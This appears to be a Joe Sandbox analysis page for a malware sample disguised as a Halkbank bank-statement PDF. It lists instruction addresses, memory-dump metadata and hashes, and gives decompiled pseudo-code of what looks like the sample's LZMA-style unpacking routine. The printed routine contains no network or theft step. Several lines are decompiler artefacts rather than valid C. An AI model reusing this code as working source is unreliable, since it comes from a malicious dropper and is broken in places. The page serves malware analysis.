                                          0x00406e5d
                                          0x00406e60
                                          0x00406e63
                                          0x00406e7f
                                          0x00406e82
                                          0x00406e85
                                          0x00406e88
                                          0x00406e8f
                                          0x00406e93
                                          0x00406e95
                                          0x00406e99
                                          0x00406e65
                                          0x00406e65
                                          0x00406e69
                                          0x00406e71
                                          0x00406e76
                                          0x00406e78
                                          0x00406e7a
                                          0x00406e7a
                                          0x00406e9c
                                          0x00406ea3
                                          0x00406ea6
                                          0x00000000
                                          0x00406eac
                                          0x00000000
                                          0x00406eac
                                          0x00000000
                                          0x00406eb1
                                          0x00406eb1
                                          0x00406eb5
                                          0x00407575
                                          0x00000000
                                          0x00407575
                                          0x00406ebb
                                          0x00406ebe
                                          0x00406ec1
                                          0x00406ec5
                                          0x00406ec8
                                          0x00406ece
                                          0x00406ed0
                                          0x00406ed0
                                          0x00406ed0
                                          0x00406ed3
                                          0x00406ed6
                                          0x00406ed6
                                          0x00406ed6
                                          0x00406edc
                                          0x00000000
                                          0x00000000
                                          0x00406ede
                                          0x00406ee1
                                          0x00406ee4
                                          0x00406ee7
                                          0x00406eea
                                          0x00406eed
                                          0x00406ef0
                                          0x00406ef3
                                          0x00406ef6
                                          0x00406ef9
                                          0x00406efc
                                          0x00406f14
                                          0x00406f17
                                          0x00406f1a
                                          0x00406f1d
                                          0x00406f1d
                                          0x00406f20
                                          0x00406f24
                                          0x00406f26
                                          0x00406efe
                                          0x00406efe
                                          0x00406f06
                                          0x00406f0b
                                          0x00406f0d
                                          0x00406f0f
                                          0x00406f0f
                                          0x00406f29
                                          0x00406f30
                                          0x00406f33
                                          0x00000000
                                          0x00406f35
                                          0x00000000
                                          0x00406f35
                                          0x00406f33
                                          0x00406f3a
                                          0x00406f3a
                                          0x00406f3a
                                          0x00406f3a
                                          0x00000000
                                          0x00000000
                                          0x00406f75
                                          0x00406f75
                                          0x00406f79
                                          0x00407581
                                          0x00000000
                                          0x00407581
                                          0x00406f7f
                                          0x00406f82
                                          0x00406f85
                                          0x00406f89
                                          0x00406f8c
                                          0x00406f92
                                          0x00406f94
                                          0x00406f94
                                          0x00406f94
                                          0x00406f97
                                          0x00406f9a
                                          0x00406f9a
                                          0x00406fa0
                                          0x00406f3e
                                          0x00406f3e
                                          0x00406f41
                                          0x00000000
                                          0x00406f41
                                          0x00406fa2
                                          0x00406fa2
                                          0x00406fa5
                                          0x00406fa8
                                          0x00406fab
                                          0x00406fae
                                          0x00406fb1
                                          0x00406fb4
                                          0x00406fb7
                                          0x00406fba
                                          0x00406fbd
                                          0x00406fc0
                                          0x00406fd8
                                          0x00406fdb
                                          0x00406fde
                                          0x00406fe1
                                          0x00406fe1
                                          0x00406fe4
                                          0x00406fe8
                                          0x00406fea
                                          0x00406fc2
                                          0x00406fc2
                                          0x00406fca
                                          0x00406fcf
                                          0x00406fd1
                                          0x00406fd3
                                          0x00406fd3
                                          0x00406fed
                                          0x00406ff4
                                          0x00406ff7
                                          0x00000000
                                          0x00406ff9
                                          0x00000000
                                          0x00406ff9
                                          0x00000000
                                          0x00407286
                                          0x00407286
                                          0x0040728a
                                          0x004075b1
                                          0x00000000
                                          0x004075b1
                                          0x00407290
                                          0x00407293
                                          0x00407296
                                          0x0040729a
                                          0x0040729d
                                          0x004072a3
                                          0x004072a5
                                          0x004072a5
                                          0x004072a5
                                          0x004072a8
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00407395
                                          0x00407399
                                          0x004073bb
                                          0x004073be
                                          0x004073c8
                                          0x004073cb
                                          0x004073cb
                                          0x004073cb
                                          0x00000000
                                          0x004073cb
                                          0x004073cb
                                          0x0040739b
                                          0x0040739e
                                          0x004073a2
                                          0x004073a5
                                          0x004073a5
                                          0x004073a8
                                          0x00000000
                                          0x00000000
                                          0x00407452
                                          0x00407456
                                          0x00407474
                                          0x00407474
                                          0x00407474
                                          0x0040747b
                                          0x00407482
                                          0x00407489
                                          0x00407489
                                          0x00000000
                                          0x00407489
                                          0x00407458
                                          0x0040745b
                                          0x0040745e
                                          0x00407461
                                          0x00407468
                                          0x004073ac
                                          0x004073ac
                                          0x004073af
                                          0x00000000
                                          0x00000000
                                          0x00407543
                                          0x00407546
                                          0x00407447
                                          0x00000000
                                          0x00000000
                                          0x0040717d
                                          0x0040717f
                                          0x00407186
                                          0x00407187
                                          0x00407189
                                          0x0040718c
                                          0x00000000
                                          0x00000000
                                          0x00407194
                                          0x00407197
                                          0x0040719a
                                          0x0040719c
                                          0x0040719e
                                          0x0040719e
                                          0x0040719f
                                          0x004071a2
                                          0x004071a9
                                          0x004071ac
                                          0x004071ba
                                          0x00000000
                                          0x00000000
                                          0x00407490
                                          0x00407490
                                          0x00407493
                                          0x0040749a
                                          0x00000000
                                          0x00000000
                                          0x0040749f
                                          0x0040749f
                                          0x004074a3
                                          0x004075db
                                          0x00000000
                                          0x004075db
                                          0x004074a9
                                          0x004074ac
                                          0x004074af
                                          0x004074b3
                                          0x004074b6
                                          0x004074bc
                                          0x004074be
                                          0x004074be
                                          0x004074be
                                          0x004074c1
                                          0x004074c4
                                          0x004074c4
                                          0x004074c4
                                          0x004074c4
                                          0x004074c7
                                          0x004074c7
                                          0x004074cb
                                          0x0040752b
                                          0x0040752e
                                          0x00407533
                                          0x00407534
                                          0x00407536
                                          0x00407538
                                          0x0040753b
                                          0x00407447
                                          0x00407447
                                          0x00000000
                                          0x0040744d
                                          0x00407447
                                          0x004074cd
                                          0x004074d3
                                          0x004074d6
                                          0x004074d9
                                          0x004074dc
                                          0x004074df
                                          0x004074e2
                                          0x004074e5
                                          0x004074e8
                                          0x004074eb
                                          0x004074ee
                                          0x00407507
                                          0x0040750a
                                          0x0040750d
                                          0x00407510
                                          0x00407514
                                          0x00407516
                                          0x00407516
                                          0x00407517
                                          0x0040751a
                                          0x004074f0
                                          0x004074f0
                                          0x004074f8
                                          0x004074fd
                                          0x004074ff
                                          0x00407502
                                          0x00407502
                                          0x0040751d
                                          0x00407524
                                          0x00000000
                                          0x00407526
                                          0x00000000
                                          0x00407526
                                          0x00000000
                                          0x004071c2
                                          0x004071c5
                                          0x004071fb
                                          0x0040732b
                                          0x0040732b
                                          0x0040732b
                                          0x0040732b
                                          0x0040732e
                                          0x0040732e
                                          0x00407331
                                          0x00407333
                                          0x004075bd
                                          0x00000000
                                          0x004075bd
                                          0x00407339
                                          0x0040733c
                                          0x00000000
                                          0x00000000
                                          0x00407342
                                          0x00407346
                                          0x00407349
                                          0x00407349
                                          0x00407349
                                          0x00000000
                                          0x00407349
                                          0x004071c7
                                          0x004071c9
                                          0x004071cb
                                          0x004071cd
                                          0x004071d0
                                          0x004071d1
                                          0x004071d3
                                          0x004071d5
                                          0x004071d8
                                          0x004071db
                                          0x004071f1
                                          0x004071f6
                                          0x0040722e
                                          0x0040722e
                                          0x00407232
                                          0x0040725e
                                          0x00407260
                                          0x00407267
                                          0x0040726a
                                          0x0040726d
                                          0x0040726d
                                          0x00407272
                                          0x00407272
                                          0x00407274
                                          0x00407277
                                          0x0040727e
                                          0x00407281
                                          0x004072ae
                                          0x004072ae
                                          0x004072b1
                                          0x004072b4
                                          0x00407328
                                          0x00407328
                                          0x00407328
                                          0x00000000
                                          0x00407328
                                          0x004072b6
                                          0x004072bc
                                          0x004072bf
                                          0x004072c2
                                          0x004072c5
                                          0x004072c8
                                          0x004072cb
                                          0x004072ce
                                          0x004072d1
                                          0x004072d4
                                          0x004072d7
                                          0x004072f0
                                          0x004072f2
                                          0x004072f5
                                          0x004072f6
                                          0x004072f9
                                          0x004072fb
                                          0x004072fe
                                          0x00407300
                                          0x00407302
                                          0x00407305
                                          0x00407307
                                          0x0040730a
                                          0x0040730e
                                          0x00407310
                                          0x00407310
                                          0x00407311
                                          0x00407314
                                          0x00407317
                                          0x004072d9
                                          0x004072d9
                                          0x004072e1
                                          0x004072e6
                                          0x004072e8
                                          0x004072eb
                                          0x004072eb
                                          0x0040731a
                                          0x00407321
                                          0x004072ab
                                          0x004072ab
                                          0x004072ab
                                          0x004072ab
                                          0x00000000
                                          0x00407323
                                          0x00000000
                                          0x00407323
                                          0x00407321
                                          0x00407234
                                          0x00407237
                                          0x00407239
                                          0x0040723c
                                          0x0040723f
                                          0x00407242
                                          0x00407244
                                          0x00407247
                                          0x0040724a
                                          0x0040724a
                                          0x0040724d
                                          0x0040724d
                                          0x00407250
                                          0x00407257
                                          0x0040722b
                                          0x0040722b
                                          0x0040722b
                                          0x0040722b
                                          0x00000000
                                          0x00407259
                                          0x00000000
                                          0x00407259
                                          0x00407257
                                          0x004071dd
                                          0x004071e0
                                          0x004071e2
                                          0x004071e5
                                          0x00000000
                                          0x00000000
                                          0x00406f44
                                          0x00406f44
                                          0x00406f48
                                          0x0040758d
                                          0x00000000
                                          0x0040758d
                                          0x00406f4e
                                          0x00406f51
                                          0x00406f54
                                          0x00406f57
                                          0x00406f5a
                                          0x00406f5d
                                          0x00406f60
                                          0x00406f62
                                          0x00406f65
                                          0x00406f68
                                          0x00406f6b
                                          0x00406f6d
                                          0x00406f6d
                                          0x00406f6d
                                          0x00000000
                                          0x00000000
                                          0x004070cf
                                          0x004070cf
                                          0x004070d3
                                          0x00407599
                                          0x00000000
                                          0x00407599
                                          0x004070d9
                                          0x004070dc
                                          0x004070df
                                          0x004070e2
                                          0x004070e4
                                          0x004070e4
                                          0x004070e4
                                          0x004070e7
                                          0x004070ea
                                          0x004070ed
                                          0x004070f0
                                          0x004070f3
                                          0x004070f6
                                          0x004070f7
                                          0x004070f9
                                          0x004070f9
                                          0x004070f9
                                          0x004070fc
                                          0x004070ff
                                          0x00407102
                                          0x00407105
                                          0x00407105
                                          0x00407105
                                          0x00407108
                                          0x0040710a
                                          0x0040710a
                                          0x00000000
                                          0x00000000
                                          0x0040734c
                                          0x0040734c
                                          0x0040734c
                                          0x00407350
                                          0x00000000
                                          0x00000000
                                          0x00407356
                                          0x00407359
                                          0x0040735c
                                          0x0040735f
                                          0x00407361
                                          0x00407361
                                          0x00407361
                                          0x00407364
                                          0x00407367
                                          0x0040736a
                                          0x0040736d
                                          0x00407370
                                          0x00407373
                                          0x00407374
                                          0x00407376
                                          0x00407376
                                          0x00407376
                                          0x00407379
                                          0x0040737c
                                          0x0040737f
                                          0x00407382
                                          0x00407385
                                          0x00407389
                                          0x0040738b
                                          0x0040738e
                                          0x00000000
                                          0x00407390
                                          0x0040710d
                                          0x0040710d
                                          0x00000000
                                          0x0040710d
                                          0x0040738e
                                          0x004075c3
                                          0x00000000
                                          0x00000000
                                          0x00406bf2
                                          0x004075fa
                                          0x004075fa
                                          0x00000000
                                          0x004075fa
                                          0x00407447
                                          0x004073ce
                                          0x004073cb
                                          0x00000000
                                          0x00407120

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.259056765.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.259049654.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259066123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259109034.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                                          • Instruction ID: aecab3f40db1f9fc07a3dc9ea3777efa7aa3d7dc23f88bc09ddd959c6243594a
                                          • Opcode Fuzzy Hash: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                                          • Instruction Fuzzy Hash: 2B711571D04228DBEF28CF98C8547ADBBB1FF44305F14806AD856BB281D778A986DF05
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00407068 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 98%
                                          			E00407068() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
